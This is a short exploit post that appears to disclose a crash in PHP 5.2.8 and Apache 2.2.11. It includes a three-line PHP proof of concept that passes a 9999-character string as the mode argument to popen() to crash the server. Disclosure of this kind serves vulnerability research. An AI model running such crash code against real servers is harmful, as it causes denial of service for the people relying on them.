Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)
Type: Remote and Local Requirements for exploit: popen() enabled. By: e.wiZz! Enes Muić [email protected] PHP Popen() function overview: Popen function in php opens a pipe to a process executed by forking the command given by command. It was implementet since PHP 4 version. popen ( string $command_to_execute , string $mode ) Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache here,is because when we execute poc.php Apache HTTP server crash without any report in error log.You can test on WAMP too,on CLI or browser. Tested on: PHP 5.2.8/4.2.1/4.2.0 Apache 2.2.11 PoC: <?php $____buff=str_repeat("A",9999); $handle = popen('/whatever/', $____buff); echo $handle; ?>
